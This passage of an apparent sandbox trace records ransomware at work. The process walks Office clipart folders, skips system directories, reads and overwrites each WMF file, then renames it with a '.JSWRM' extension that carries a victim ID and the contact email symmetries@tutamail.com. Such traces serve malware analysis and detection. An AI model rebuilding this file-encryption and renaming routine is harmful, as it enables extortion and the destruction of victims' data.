lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4200) returned 1 [0082.567] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1060) returned 0x23fc98 [0082.567] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1060, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1060, lpOverlapped=0x0) returned 1 [0082.570] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.570] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1060, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1060, lpOverlapped=0x0) returned 1 [0082.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.570] CloseHandle (hObject=0x314) returned 1 [0082.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0082.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0082.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0082.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0082.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.570] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.571] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a54, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107502.WMF", cAlternateFileName="")) returned 1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2=".") returned 1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="..") returned 1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="...") returned 1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="windows") returned -1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="recovery") returned -1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="perflogs") returned -1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="documents and settings") returned 1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="system volume information") returned -1 [0082.571] lstrcmpiW (lpString1="J0107502.WMF", lpString2="msocache") returned -1 [0082.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0082.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107502.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107502.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107502.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0082.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107502.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107502.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107502.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0082.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0082.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.572] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10836) returned 1 [0082.572] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a50) returned 0x24d210 [0082.572] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a50, lpOverlapped=0x0) returned 1 [0082.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.574] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a50, lpOverlapped=0x0) returned 1 [0082.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.574] CloseHandle (hObject=0x314) returned 1 [0082.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0082.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0082.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0082.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0082.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0082.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0082.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.575] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0082.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0082.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0082.575] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c8c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107512.WMF", cAlternateFileName="")) returned 1 [0082.575] lstrcmpiW (lpString1="J0107512.WMF", lpString2=".") returned 1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="..") returned 1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="...") returned 1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="windows") returned -1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="recovery") returned -1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="perflogs") returned -1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="documents and settings") returned 1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="system volume information") returned -1 [0082.576] lstrcmpiW (lpString1="J0107512.WMF", lpString2="msocache") returned -1 [0082.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0082.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107512.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107512.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107512.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0082.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0082.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107512.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107512.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107512.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0082.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.576] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11404) returned 1 [0082.576] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c80) returned 0x24d210 [0082.577] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2c80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2c80, lpOverlapped=0x0) returned 1 [0082.683] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.684] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2c80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2c80, lpOverlapped=0x0) returned 1 [0082.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.684] CloseHandle (hObject=0x314) returned 1 [0082.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0082.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0082.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0082.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0082.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0082.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.685] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0082.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.686] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78281d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe78281d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107514.WMF", cAlternateFileName="")) returned 1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2=".") returned 1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="..") returned 1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="...") returned 1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="windows") returned -1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="recovery") returned -1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="perflogs") returned -1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="documents and settings") returned 1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="system volume information") returned -1 [0082.687] lstrcmpiW (lpString1="J0107514.WMF", lpString2="msocache") returned -1 [0082.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0082.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107514.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107514.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107514.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0082.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0082.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107514.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107514.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107514.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0082.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0082.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.688] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12204) returned 1 [0082.688] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fa0) returned 0x24d210 [0082.688] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2fa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2fa0, lpOverlapped=0x0) returned 1 [0082.690] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.690] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2fa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2fa0, lpOverlapped=0x0) returned 1 [0082.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.690] CloseHandle 